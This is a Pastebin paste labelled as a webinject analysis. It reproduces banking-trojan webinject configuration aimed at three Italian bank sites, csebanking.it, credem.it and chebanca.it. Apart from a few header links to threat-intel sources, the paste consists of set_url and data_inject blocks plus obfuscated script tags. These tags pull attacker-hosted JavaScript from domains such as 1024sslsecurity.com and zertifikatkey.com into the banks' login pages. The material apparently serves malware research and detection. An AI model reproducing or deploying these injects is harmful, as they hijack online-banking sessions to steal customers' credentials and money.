SHARE
TWEET

Banking Malware. Webinject for Italian Banks

guelfoweb Jun 10th, 2015 (edited) 683 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Webinject analysis
  2.  
  3. // +------
  4. // | Pony and Tbag/pykbot -> https://twitter.com/kafeine/status/608598509147820032
  5. // | VT: https://www.virustotal.com/en/file/1a4a9f42c13e1928b907a03e1b50588800f8340d9335afe894a426629348aca8/analysis/
  6. // | http://blog.kleissner.org/?p=788
  7. // +------
  8.  
  9. // https://www.csebanking.it
  10. // https://1024sslsecurity.com/sajf98wquioijhsa/scripts/csebanking.js
  11.  
  12. // https://banking.credem.it
  13. // https://1024sslsecurity.com/sajf98wquioijhsa/scripts/credem.js
  14.  
  15. // https://www.chebanca.it
  16. // https://1024sslsecurity.com/sajf98wquioijhsa/scripts/chebanca.js
  17.  
  18. ========================================================================
  19.  
  20. <script type="text/javascript" id="inj_add">
  21. navigator.bot_id="user1_C4369E3B11BB4CD799D6F0780AD97B1A";
  22. document.write('<scr'+'ipt type="text/javascript" id="inj_inj" src="https://zertifikatkey.com/images/content/bankofscotland/bankofscotland.js?r='+Number(new Date())+'"></scr'+'ipt>');
  23. </script>
  24.  
  25. <script type="text/javascript" id="inj_add">
  26. navigator.bot_id="user1_C4369E3B11BB4CD799D6F0780AD97B1A";
  27. navigator.adm="https://zertifikatkey.com/images/";
  28. document.write('<scr'+'ipt type="text/javascript" id="inj_inj" src="https://zertifikatkey.com/images/content/lloydsbank/lloydsbank.js?r='+Number(new Date())+'"></scr'+'ipt>');
  29. </script>
  30.  
  31. <script type="text/javascript">
  32. if (!window.jQuery){
  33.        document.write('<scr' + 'ipt src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/jquery.js"></scr' + 'ipt>');
  34. }
  35. </script>
  36. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/csebanking.js"></script>
  37.  
  38. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/chebanca.js"></script>
  39.  
  40.  
  41. data_end
  42. data_after
  43. data_end
  44.  
  45.  
  46. set_url https://www.csebanking.it/fec/*.html*
  47. data_before
  48. data_end
  49. data_inject
  50. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/jquery.js"></script>
  51. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/csebanking.js"></script>
  52. data_end
  53. data_after
  54. <script
  55. data_end
  56.  
  57.  
  58. set_url https://banking.credem.it*
  59. data_before
  60. data_end
  61. data_inject
  62. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/credem.js"></script>
  63. data_end
  64. data_after
  65. </head>
  66. data_end
  67.  
  68. set_url https://www.chebanca.it*
  69. data_before
  70. data_end
  71. data_inject
  72. <script type="text/javascript">
  73. if (!window.jQuery){
  74.        document.write('<scr' + 'ipt src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/jquery.js"></scr' + 'ipt>');
  75. }
  76. </script>
  77. <script type="text/javascript" src="https://1024sslsecurity.com/sajf98wquioijhsa/scripts/chebanca.js"></script>  
  78. data_end
  79. data_after
  80. </head>
  81. data_end
RAW Paste Data
Top